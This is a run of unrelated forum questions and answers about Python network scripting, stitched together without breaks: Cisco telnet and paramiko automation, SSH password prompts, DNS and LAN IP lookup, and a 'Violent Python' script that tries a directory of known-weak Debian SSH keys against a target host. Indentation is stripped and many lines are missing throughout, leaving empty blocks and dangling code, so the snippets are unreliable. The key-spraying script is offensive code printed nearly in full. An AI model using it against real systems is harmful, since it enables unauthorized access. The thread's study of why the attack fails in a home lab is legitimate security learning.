Here is my telnet script as:
import sys
import getpass
import telnetlib
import time
HOST = ""
user = input("Enter your remote telnet account: ")
password = getpass.getpass()
tn = telnetlib.Telnet(HOST)
tn.read_until(b"Username: ")
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.write(b"show version\n")
tn.write(b"config t\n")
tn.write(b"interface loopback 1\n")
tn.write(b"ip address\n")
Here, If I am using some long output command as "Show Version" then this script is not working as wanted and it will show only few lines of output and also cut the next command as:
Enter your remote telnet account: deepak
R1#show version
Cisco IOS Software, 7200 Software (C7200-ADVIPSERVICESK9-M), Version 15.2(4)S5, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2014 by Cisco Systems, Inc.
Compiled Thu 20-Feb-14 06:51 by prod_rel_team
ROM: ROMMON Emulation Microcode
BOOTLDR: 7200 Software (C7200-ADVIPSERVICESK9-M), Version 15.2(4)S5, RELEASE SOFTWARE (fc1)
R1 uptime is 2 hours, 16 minutes
System returned to ROM by unknown reload cause - suspect boot_data[BOOT_COUNT] 0x0, BOOT_COUNT 0, BOOTDATA 19
System image file is "tftp://"
Last reload reason: Unknown reason
This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, **distributors and users are responsible for**
**R1#onfig t**
% Invalid input detected at '^' marker.
R1#interface loopback 1
% Invalid input detected at '^' marker.
R1#ip address
% Invalid input detected at '^' marker.
Looking your help for the same.
Instead of:
tn.write(b"config t\n")
Try to use:
tn.write("config t\n")
A better way to compact you script will be to store the commands to config into a list like this way:
commands =['conf t', 'interface loopback 1', 'ip address']
for command in commands:
At the end of your code you change some thing like this, but first be sure about your Router :
Be sure that in your Router you configured :
aaa new-model ( with : aaa authentication login default local )
Also in line vty 0 15 : transport input all, login authentication default
# if you configured enable password you should use this section :
# Code for test :
tn.write(b"des TEST\n")
# **End section should be exactly like this line**
I'm going to ssh to the server using python and kivy in order to make an ssh tunnel. What I've done is execute this command: ssh -vND port user#my-server-ip.
import os
connect_command = "ssh -vND port user#my-server-ip"
returned_value = os.system(connect_command)
password = "something-got-from-user-input"
It is connecting correctly but the problem is that I can't enter the password when user#my-server-ip's password: prompted.
What I have done for this, is:
text = "user#my-server-ip's password:"
if (returned_value.startswith(text)):
os.system(password + "\n")
but it doesn't work.
So how can I enter the password I got from the user when it needs the password to be entered in order to connect?
when I type in nslookup in cmd I get this output:
Default Server: my server name.
I would like to use Python to output ONLY the DNS address. Just the number. How can I do that?
This is what I tried, but it opens up cmd again...
import os
print (os.system("nslookup"))
The output of print should be something like "" ONLY.
I am trying to automate to collect the logs from the Cisco Call Manager via CLI by using the from paramiko_expect import SSHClientInteraction where I am not able to send the interactive command to the server.
While trying to download the logs, it will ask information like SFTP IP address, username, password and directory which needs to send an interactive command.
whenever the code runs, it stops at the interactive command section where its not sending the command to the server because of which python script stops here. need to know is there any other way to code these requirements.
for example
Below section is interactive shell where I have to type y/xx.xx.xx.xx/22/User ID/Password/Directory but I can't do the same.
I need help here.. to send the command
Would you like to proceed [y/n]? y
SFTP server IP: xx.xx.xx.xx
SFTP server port [22]: 22
User ID: *****
Password: *****
Download directory: /
Command Line Interface is starting up, please wait ...
Welcome to the Platform Command Line Interface
VMware Installation:
4 vCPU: Intel(R) Xeon(R) Platinum 8180 CPU # 2.50GHz
Disk 1: 110GB, Partitions aligned
6144 Mbytes RAM
admin:file get activelog /syslog/AlternateSyslog
Please wait while the system is gathering files info ...
Get file: active/syslog/AlternateSyslog
Sub-directories were not traversed.
Number of files affected: 5
Total size in Bytes: 23354752
Total size in Kbytes: 22807.375
Would you like to proceed [y/n]? y
SFTP server IP: xx.xx.xx.xx
SFTP server port [22]:
User ID: *****
Password: *****
Download directory: /
The authenticity of host 'xx.xx.xx.xx (xx.xx.xx.xx)' can't be established.
Are you sure you want to continue connecting (yes/no)? yes
Transfer completed.
I am able to get the show command output but not able to download the logs.
# PSFL license
# Importing SSHClientInteraction from paramiko
import paramiko
from paramiko_expect import SSHClientInteraction
import threading
# Specify connection info for each node in square brackets: ["IP ADDRESS", "USERNAME", "PASSWORD"]
connection = [["xx.xx.xx.xx", "userid", "password"]]
# Define function which is responsible for opening SSH connection and running specified commands
def cucm(ip, username, password):
sshsession = paramiko.SSHClient()
sshsession.connect(ip, username=username, password=password)
# "display=True" is just to show you what script does in real time. While in production you can set it to False
interact = SSHClientInteraction(ssh, timeout=600, display=True)
# program will wait till session is established and CUCM returns admin prompt
# program runs show status command
interact.send('show status')
# program waits for show status command to finish (this happen when CUCM returns admin prompt)
# program sends syslog to download the file
interact.send('file get activelog /syslog/AlternateSyslog')
if interact.last_match == 'Would you like to proceed [y/n]? ': # program matches prompted command by using if command and will send interact command to it.
if interact.last_match == 'SFTP server IP:':
if interact.last_match == 'SFTP server port [22]:':
if interact.last_match == 'User ID:':
if interact.last_match == 'Password:':
if interact.last_match == 'Download directory:':
output = interact.current_output_clean # program saves output of show status command to the "output" variable
# Run loop which will open separate thread for each node specified in the connection list. This targets "session" function defined at the beginning
for i in connection:
t = threading.Thread(target = cucm, args = (i[0], i[1], i[2]))
t.daemon = True
Below is the output for the python script.
there is no error message but it stops at Would you like to proceed [y/n]? here
Command Line Interface is starting up, please wait ...
Welcome to the Platform Command Line Interface
VMware Installation:
4 vCPU: Intel(R) Xeon(R) Platinum 8180 CPU # 2.50GHz
Disk 1: 110GB, Partitions aligned
6144 Mbytes RAM
admin:file get activelog /syslog/AlternateSyslog
Please wait while the system is gathering files info ...
Get file: active/syslog/AlternateSyslog
Sub-directories were not traversed.
Number of files affected: 1
Total size in Bytes: 2261400
Total size in Kbytes: 2208.3984
Would you like to proceed [y/n]?
You could try adding the global configuration command "file prompt quiet" at the beginning of your program before any other commands are sent. This will suppress any yes/no questions and auto them to the default. Just make sure that at the end of the code you turn it back off to prevent any later nasty surprises using "file prompt alert".
This works in most Cisco IOS platforms, if the command is different in CUCM I'm sure there will be an equivalent to do the same thing.
maybe you already sorted this out, but I see, that you have there one small type, which could stop that script of moving forward:
you have there:
instead of:
I am new to python. I want to get the ipaddress of the system. I am connected in LAN. When i use the below code to get the ip, it shows instead of Why it is not showing the LAN ip. Then how can i get my LAN ip. Every tutorials shows this way only. I also checked via connecting with mobile hotspot. Eventhough, it shows the same.
import socket
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
print("Your Computer Name is:" + hostname)
print("Your Computer IP Address is:" + IPAddr)
Your Computer Name is:smackcoders
Your Computer IP Address is:
Required Output:
Your Computer Name is:smackcoders
Your Computer IP Address is:
I got this same problem with my raspi.
host_name = socket.gethostname()`
host_addr = socket.gethostbyname(host_name)
and now if i print host_addr, it will print
So i foundthis:
host_addr = socket.gethostbyname(host_name + ".local")
and it worked.
As per the above '/etc/hosts' file content, you have an IP address mapping with '' to your hostname. This is causing the name resolution to get You can try removing/commenting this line and rerun.
How can I get the IP address of eth0 in Python?
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("", 80))
print s.getsockname()[0]
This also worked for me:
i get the same problem what your are facing. but I get the solution with help of my own idea, And don't worry it is simple to use.
if you familiar to linux you should heard the ifconfig command which return the informations about the network interfaces, and also you should understand about grep command which filter the lines which consist specified words
now just open the terminal and type
ifconfig | grep
and hit enter now you will get wlan inet address line alone like below
inet netmask broadcast
in your terminal
in your python script just insert
#!/usr/bin/env python
import subprocess
cmd = "ifconfig | grep"
inet = subprocess.check_output(cmd, shell = True)
inet = wlan.decode("utf-8")
inet = wlan.split(" ")
inet_addr = inet[inet.index("inet")+1]
this script return your local ip address, this script works for me and I hope this will work for your linux machine
all the best
This solution works for me on Windows. If you're using Linux you could try this line of code instead:
IPAddr = socket.gethostbyname(socket.getfqdn())
So I am reading this awesome book, "Violent Python". And in Chapter 2 there is a Python script that uses private keys to authenticate to a Debian machine or possibly any machine running an SSH server that has users on it without strong private keys. Below is the script:
#! /usr/bin/env python
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + \
'#' + host + ' -i ' + keyfile + opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, \
ssh_newkey, conn_closed, '$', '#',])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. ' + str(keyfile)
Stop = True
if release:
def main():
parser = optparse.OptionParser('usage%prog -H ' + \
'<target host> -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='specify target host')
parser.add_option('-d', dest='passDir', type='string', \
help='specify directory with keys')
parser.add_option('-u', dest='user', type='string', \
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user = options.user
if host == None or passDir == None or user == None:
print parser.usage
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
if Fails > 5:
print '[!] Exiting: '+ \
'Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
fullpath = os.path.join(passDir, filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect, \
args=(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
The weird thing is when I run this on my internal LAN against a copy of Kali, that is based on Debian, the Python script prints that it has found some vulnerable private keys. I am not sure why it finds several vulnerable keys though for a single user on the OS. When I run the script I specify 1) a host, 2) a username, and 3) a directory full of private keys generated by HD Moore. I had to use the wayback machine to obtain the RSA private keys he generated for the 2048 strength asymmetric algorithm.
Example output:
[-] Testing keyfile rsa/2048/0002d5af29276c95a49dc2ab3b506707-23747
[-] Testing keyfile rsa/2048/00030d8fbf8ef4e6c7c878e5a3700192-29213
[+] Success. rsa/2048/.DS_Store
[+] Success. rsa/2048/0002d5af29276c95a49dc2ab3b506707-23747
[-] Testing keyfile rsa/2048/0004c120c8d0b5820c5d84d35e3c8d19-20980
[*] Exiting: Key Found.
[+] Success. rsa/2048/0004c120c8d0b5820c5d84d35e3c8d19-20980
[+] Success. rsa/2048/00030d8fbf8ef4e6c7c878e5a3700192-29213
Anyways, why does the script say it found numerous private keys for my username on my Debian Kali virtual machine (VM)? I tried to log in with the apparently vulnerable private key with the ssh -irsa/2048/0002d5af29276c95a49dc2ab3b506707-23747 root# -o PasswordAuthentication=no command but it did not work. Why does it not work? Is the Python script not actually doing what it says it is doing? X-Ray Glasses anyone? Let me go on...
Then I checked the /var/log/auth.log on my Debian Kali VM and it has some interesting and mysterious entries. The log says, Public key <Hexadecimal colon separated key> from <IP> blacklisted (see ssh-vulnkey(1))
I read the man page for the ssh-vulnkey on the Debian Kali OS and found out that this program could find vulnerable keys on a computer. I tried running this with the -v verbose option and saw that some keys are apparently vulnerable, though I do not understand what the f key is going on.
Does anyone have an easy to understand explanation about 1) why the script returns results that it successfully found a key(s) and 2) what the blacklisted auth.log message means? Also, 3) if it found a vulnerable key why can I not use said key to log into my computer?
Also, should this be moved to information-security?
Wicked Python script by:
O'Connor, TJ (2012-12-28). Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers. Elsevier Science. Kindle Edition.
As far as I can tell the script just iterates through the directory and tries to use them as keys to connect to the given SSH server. This is done in threads, so the order of your output is not deterministic. Since we check if the global Stop flag is True before starting new threads it may happen that not all files are checked because one earlier thread already finished successfully and set the flag. This is why it reports that it found a key.
Your SSH daemon blacklists weak keys that were generated by a broken version of OpenSSL. This is a good thing and you can read about it here. That is also why you can't login.
ssh automatically falls back to looking for valid keys in your configuration directory. So the connection does actually succeed, but your command line argument is ignored. Try running the command with -vvv and observe the output:
$ ssh user#host -i not-a-key -o PasswordAuthentication=no -vvv
debug1: identity file /path/to/not-a-key type -1